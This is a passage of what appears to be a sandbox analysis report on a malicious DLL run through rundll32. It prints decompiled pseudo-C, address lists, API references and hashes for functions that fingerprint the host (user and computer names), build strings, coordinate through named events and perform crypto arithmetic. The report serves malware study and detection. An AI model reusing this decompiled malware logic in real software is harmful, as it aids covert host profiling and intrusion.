									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x45e3764
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x045e3ad8
0x045e3adb
0x045e3ade
0x045e3ae4
0x045e3ae9
0x045e3aef
0x045e3af7
0x045e3afa
0x045e3b00
0x045e3b05
0x045e3b0e
0x045e3b12
0x045e3b1f
0x045e3b23
0x045e3b25
0x045e3b29
0x045e3b2c
0x045e3b3c
0x045e3b8f
0x045e3b90
0x045e3b3e
0x045e3b43
0x045e3b44
0x045e3b49
0x045e3b4c
0x045e3b5f
0x00000000
0x045e3b61
0x045e3b64
0x045e3b69
0x045e3b77
0x045e3b7a
0x045e3b80
0x045e3b85
0x00000000
0x045e3b87
0x045e3b87
0x045e3b8a
0x045e3b8a
0x045e3b85
0x045e3b5f
0x045e3b95
0x045e3b96
0x045e3b05
0x045e3b9c

APIs

GetUserNameW.ADVAPI32(00000000,045E3762), ref: 045E3ADE
GetComputerNameW.KERNEL32(00000000,045E3762), ref: 045E3AFA

Part of subcall function 045E7A71: RtlAllocateHeap.NTDLL(00000000,00000000,045E4DB1), ref: 045E7A7D

GetUserNameW.ADVAPI32(00000000,045E3762), ref: 045E3B34
GetComputerNameW.KERNEL32(045E3762,775EC740), ref: 045E3B57
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,045E3762,00000000,045E3764,00000000,00000000,?,775EC740,045E3762), ref: 045E3B7A

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: 4ed3a1759ee20d36f49b59034f2dcc4b53f215fa7f6c400603a401d55e41b3ca
Instruction ID: acb929536dab4a4ae33b58a4d3e929114edc777b0af2e79b18be1c6d9468e2a1
Opcode Fuzzy Hash: 4ed3a1759ee20d36f49b59034f2dcc4b53f215fa7f6c400603a401d55e41b3ca
Instruction Fuzzy Hash: B621A9B6900209EFDB15DFE6D9858EEBBBCFE44304B5044AAE502E7240E634AB44EB50

Uniqueness

Uniqueness Score: -1.00%

Function 045E64A2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E045E64A2(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				intOrPtr _t30;
				intOrPtr _t34;
				intOrPtr* _t42;
				void* _t43;
				void* _t46;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_t42 = _a16;
				_t48 = __eax;
				_t22 =  *0x45ea348; // 0xa0d5a8
				_t2 = _t22 + 0x45eb67a; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
				if( *0x45ea2ec >= 5) {
					_t30 = E045E3643(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
					L5:
					_a4 = _t30;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x45ea2ec =  *0x45ea2ec + 1;
						L10:
						return _a4;
					}
					_t50 = _a16;
					 *_t48 = _a16;
					_t49 = _v8;
					 *_t42 = E045E7194(_t50, _t49);
					_t34 = E045E1EDF(_t49, _t50);
					if(_t34 != 0) {
						 *_a8 = _t49;
						 *_a12 = _t34;
						if( *0x45ea2ec < 5) {
							 *0x45ea2ec =  *0x45ea2ec & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E045E14C6();
					HeapFree( *0x45ea2d8, 0, _t49);
					goto L9;
				}
				_t51 =  *0x45ea3e0; // 0x4ff9bc8
				if(RtlAllocateHeap( *0x45ea2d8, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t30 = E045E6CA4(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
				goto L5;
			}

0x045e64a9
0x045e64b0
0x045e64b4
0x045e64b9
0x045e64c4
0x045e64d4
0x045e6523
0x045e6528
0x045e6528
0x045e652b
0x045e652f
0x045e6569
0x045e6569
0x045e656f
0x045e6576
0x045e6576
0x045e6531
0x045e6534
0x045e6536
0x045e6543
0x045e6545
0x045e654c
0x045e6583
0x045e6588
0x045e658a
0x045e658c
0x045e658c
0x00000000
0x045e658a
0x045e654e
0x045e6555
0x045e6563
0x00000000
0x045e6563
0x045e64d6
0x045e64f1
0x045e650b
0x00000000
0x045e650b
0x045e6504
0x00000000

APIs

wsprintfA.USER32 ref: 045E64C4
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 045E64E9

Part of subcall function 045E6CA4: GetTickCount.KERNEL32 ref: 045E6CBB
Part of subcall function 045E6CA4: wsprintfA.USER32 ref: 045E6D08
Part of subcall function 045E6CA4: wsprintfA.USER32 ref: 045E6D25
Part of subcall function 045E6CA4: wsprintfA.USER32 ref: 045E6D47
Part of subcall function 045E6CA4: wsprintfA.USER32 ref: 045E6D6E
Part of subcall function 045E6CA4: wsprintfA.USER32 ref: 045E6D8F
Part of subcall function 045E6CA4: wsprintfA.USER32 ref: 045E6DBA
Part of subcall function 045E6CA4: HeapFree.KERNEL32(00000000,?), ref: 045E6DCD

HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 045E6563

Strings

Uqt, xrefs: 045E6563

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: wsprintf$Heap$Free$AllocateCountTick
String ID: Uqt
API String ID: 1307794992-2320327147
Opcode ID: 55961b5b967f22a521e137cec90577c5fa0af605f9659be95a80d8a49dba43bc
Instruction ID: e9a9eeca254bb123c25a47c099262316c1db778f3bbf3795079dadb9ed401bbf
Opcode Fuzzy Hash: 55961b5b967f22a521e137cec90577c5fa0af605f9659be95a80d8a49dba43bc
Instruction Fuzzy Hash: D9315071600209EBCB09DFA6D884AEE3BBCFB58354F508012F905AB211D735FD49EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 045E1335 Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 045E1370
SysFreeString.OLEAUT32(00000000), ref: 045E1455

Part of subcall function 045E55F9: SysAllocString.OLEAUT32(045E9284), ref: 045E5649

SafeArrayDestroy.OLEAUT32(00000000), ref: 045E14A8
SysFreeString.OLEAUT32(00000000), ref: 045E14B7

Part of subcall function 045E43F6: Sleep.KERNEL32(000001F4), ref: 045E443E

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: 0ac31b2e829594cce57bc3447db46316eb7a247d2936ea9e1f62113dd02dd18a
Instruction ID: a31334412fd6ca56ff101b60b62e50413b2b99e2f907591513a16a3e143b7366
Opcode Fuzzy Hash: 0ac31b2e829594cce57bc3447db46316eb7a247d2936ea9e1f62113dd02dd18a
Instruction Fuzzy Hash: 56518D76500A0AAFDB05CFA9D844AEEB7B6FFC8700B148828E915DB310EB35ED05DB50

Uniqueness

Uniqueness Score: -1.00%

Function 045E55F9 Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E045E55F9(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x45ea348; // 0xa0d5a8
					_t5 = _t103 + 0x45eb038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x45e9284);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x45ea348; // 0xa0d5a8
												_t28 = _t109 + 0x45eb0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x45ea348; // 0xa0d5a8
														_t33 = _t79 + 0x45eb078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x045e55fe
0x045e5607
0x045e5608
0x045e560c
0x045e5612
0x045e5618
0x045e5621
0x045e5627
0x045e5631
0x045e5633
0x045e5639
0x045e563e
0x045e5649
0x045e564f
0x045e5654
0x045e5776
0x045e565a
0x045e565a
0x045e5667
0x045e566d
0x045e5673
0x045e5677
0x045e567d
0x045e568a
0x045e568e
0x045e5694
0x045e5697
0x045e569f
0x045e56a0
0x045e56a4
0x045e56a8
0x045e56ab
0x045e56ae
0x045e56b4
0x045e56bd
0x045e56c3
0x045e56c4
0x045e56c7
0x045e56c8
0x045e56c9
0x045e56d1
0x045e56d2
0x045e56d3
0x045e56d5
0x045e56d9
0x045e56dd
0x00000000
0x00000000
0x045e56e3
0x045e56ec
0x045e56f2
0x045e56fc
0x045e5700
0x045e5702
0x045e570f
0x045e5713
0x045e571b
0x045e5720
0x045e5732
0x045e5734
0x045e573a
0x045e573a
0x045e5743
0x045e5743
0x045e5745
0x045e574b
0x045e574b
0x045e574e
0x045e5754
0x045e5757
0x045e5760
0x00000000
0x00000000
0x00000000
0x045e5760
0x045e56b4
0x045e56ae
0x045e5697
0x045e5766
0x045e5766
0x045e576c
0x045e576c
0x045e5772
0x045e5772
0x045e577b
0x045e5781
0x045e5781
0x045e563e
0x045e578a

APIs

SysAllocString.OLEAUT32(045E9284), ref: 045E5649
lstrcmpW.KERNEL32(00000000,0076006F), ref: 045E572A
SysFreeString.OLEAUT32(00000000), ref: 045E5743
SysFreeString.OLEAUT32(?), ref: 045E5772

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 5da7d81e6b148befa5a5186382250314d5733516270cfd3988690aa56c17a7f2
Instruction ID: 37976d6b6b5a857fa35a93e65add8f0533e74d22f4bb76a38155b68c46bf8c31
Opcode Fuzzy Hash: 5da7d81e6b148befa5a5186382250314d5733516270cfd3988690aa56c17a7f2
Instruction Fuzzy Hash: FB518E75D0060AEFCB05DFE9C488DAEB7B6FF88745B144584E815EB210E731AD41DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 045E19D1 Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E045E19D1(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E045E43E5(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E045E17D5(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E045E4376(_t101,  &_v428, _a8, _t96 - _t81);
					E045E4376(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E045E17D5(_t101, 0x45ea1d0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E045E17D5(_a16, _a4);
						E045E71DF(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L045E82AA();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L045E82A4();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E045E3506(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E045E5422(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E045E4CD2(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x45ea1d0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x045e19d4
0x045e19e0
0x045e19e6
0x045e19eb
0x045e19ef
0x045e1b61
0x045e1b65
0x045e1b65
0x045e19f5
0x045e19f9
0x045e19fd
0x045e1a00
0x045e1a0b
0x045e1a11
0x045e1a16
0x045e1a19
0x045e1a33
0x045e1a42
0x045e1a4e
0x045e1a58
0x045e1a5d
0x045e1a5f
0x045e1a62
0x045e1b19
0x045e1b1f
0x045e1b30
0x045e1b43
0x045e1b59
0x00000000
0x045e1b5e
0x045e1a6b
0x045e1a72
0x045e1a76
0x045e1a7c
0x045e1a7e
0x045e1a80
0x045e1a82
0x045e1a84
0x045e1a8e
0x045e1a93
0x045e1a95
0x045e1a97
0x045e1a98
0x045e1a99
0x045e1a9a
0x045e1aa1
0x045e1aa8
0x045e1aab
0x045e1aab
0x045e1a78
0x045e1a78
0x045e1a78
0x045e1ab3
0x045e1abb
0x045e1ac7
0x045e1acc
0x045e1acc
0x045e1ad1
0x00000000
0x00000000
0x045e1ad3
0x045e1ad6
0x045e1ae3
0x00000000
0x00000000
0x045e1ae5
0x045e1ae5
0x045e1af2
0x045e1acc
0x045e1ad1
0x00000000
0x00000000
0x00000000
0x045e1ad1
0x045e1afc
0x045e1aff
0x045e1b02
0x045e1b09
0x045e1b09
0x045e1b16
0x00000000
0x045e1b16
0x045e1a02
0x045e1a06
0x045e1a07
0x045e1a09
0x00000000
0x00000000
0x00000000
0x045e1a09
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 045E1A84
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 045E1A9A
memset.NTDLL ref: 045E1B43
memset.NTDLL ref: 045E1B59

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 75f59b954f3d48ba432f1ca6fc0049b381471331bbe65adb0a55a1092c4d4364
Instruction ID: 88be383e5a86b573b6f4e9990999af9975137f956fd68136dd71c4033a312155
Opcode Fuzzy Hash: 75f59b954f3d48ba432f1ca6fc0049b381471331bbe65adb0a55a1092c4d4364
Instruction Fuzzy Hash: A641B571A0061AAFEB18DF6ADC44BFE7775FF85714F004669B80597180EB70BE44AB80

Uniqueness

Uniqueness Score: -1.00%

Function 045E797A Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E045E797A(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x45ea310; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x45ea348; // 0xa0d5a8
				_t3 = _t8 + 0x45eb87a; // 0x61636f4c
				_t25 = 0;
				_t30 = E045E6702(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x45ea34c, 1, 0, _t30);
					E045E789E(_t30);
				}
				_t12 =  *0x45ea2fc; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E045E7256() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E045E3BF0(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x45ea124( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E045E5854(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x045e797b
0x045e7982
0x045e798c
0x045e7990
0x045e7996
0x045e79a5
0x045e79ac
0x045e79b0
0x045e79c2
0x045e79c4
0x045e79c4
0x045e79c9
0x045e79d0
0x045e7a27
0x045e7a27
0x045e7a2d
0x045e7a2f
0x045e7a2f
0x045e7a39
0x045e7a3d
0x045e7a4f
0x045e7a4f
0x045e7a53
0x045e7a59
0x045e7a59
0x00000000
0x045e79e9
0x045e79ee
0x045e79f6
0x045e79fa
0x045e79fe
0x045e79fe
0x045e7a0b
0x045e7a0f
0x045e7a13
0x045e7a68
0x045e7a6e
0x045e7a6e
0x045e7a21
0x045e7a25
0x045e7a5c
0x045e7a5e
0x045e7a61
0x045e7a61
0x00000000
0x045e7a5e
0x045e7a25
0x00000000
0x045e7a0f

APIs

Part of subcall function 045E6702: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,04FF9DC0,00000000,?,?,69B25F44,00000005,045EA00C,4D283A53,?,?), ref: 045E6738
Part of subcall function 045E6702: lstrcpy.KERNEL32(00000000,00000000), ref: 045E675C
Part of subcall function 045E6702: lstrcat.KERNEL32(00000000,00000000), ref: 045E6764

CreateEventA.KERNEL32(045EA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,045E68D0,?,?,?), ref: 045E79BB

Part of subcall function 045E789E: RtlFreeHeap.NTDLL(00000000,00000000,045E4E3E,00000000,?,00000000,00000000), ref: 045E78AA

WaitForSingleObject.KERNEL32(00000000,00004E20,045E68D0,00000000,00000000,?,00000000,?,045E68D0,?,?,?), ref: 045E7A1B
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,045E68D0,?,?,?), ref: 045E7A49
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,045E68D0,?,?,?), ref: 045E7A61

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: f91a63d6b11e3e26eeabd487e435d1008b454ecb9b3e70a82ef4415525d5530d
Instruction ID: c3700a6b015308961249ef861c4bd2a73402cf5761b872873a61c81484cc5d3f
Opcode Fuzzy Hash: f91a63d6b11e3e26eeabd487e435d1008b454ecb9b3e70a82ef4415525d5530d
Instruction Fuzzy Hash: ED2146765003529BC7299E6BAC44A7A7399FF8C710F010624FA91EB140DB24EE04B380

Uniqueness

Uniqueness Score: -1.00%

Function 045E6821 Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E045E6821(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E045E6413(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E045E14E2(_t23);
						}
					}
					return _t38;
				}
				if(E045E1CE6(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x45ea34c, 1, 0,  *0x45ea3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E045E155C(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E045E2331(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E045E1544(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E045E797A( &_v32, _t39);
					goto L13;
				}
			}

0x045e6821
0x045e682e
0x045e6834
0x045e6835
0x045e6836
0x045e6837
0x045e6838
0x045e683c
0x045e6848
0x045e684c
0x045e68d4
0x045e68d4
0x045e68d7
0x045e68d9
0x045e68e1
0x045e68e7
0x045e68ea
0x045e68ea
0x045e68e7
0x045e68f5
0x045e68f5
0x045e685f
0x045e6861
0x045e6861
0x045e6878
0x045e687c
0x045e687f
0x045e688a
0x045e6891
0x045e6891
0x045e689a
0x045e689e
0x045e68ac
0x045e68a0
0x045e68a0
0x045e68a1
0x045e68a2
0x045e68a3
0x045e68a4
0x045e68a5
0x045e68a5
0x045e68b1
0x045e68b4
0x045e68b8
0x045e68ba
0x045e68ba
0x045e68c1
0x00000000
0x045e68c3
0x045e68c3
0x045e68d0
0x00000000
0x045e68d0

APIs

CreateEventA.KERNEL32(045EA34C,00000001,00000000,00000040,?,?,7476F710,00000000,7476F730), ref: 045E6872
SetEvent.KERNEL32(00000000), ref: 045E687F
Sleep.KERNEL32(00000BB8), ref: 045E688A
CloseHandle.KERNEL32(00000000), ref: 045E6891

Part of subcall function 045E155C: WaitForSingleObject.KERNEL32(00000000,?,?,?,045E68B1,?,045E68B1,?,?,?,?,?,045E68B1,?), ref: 045E1636

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: 72d9eb6ea2bdfb0f97a06b58dd6212382cacb5f7b1e2b23078ccc4ec6f59b8ea
Instruction ID: bd271558bb533b8b1c54ed35da52c363d7974a03192bb119c7b4871a84c753d8
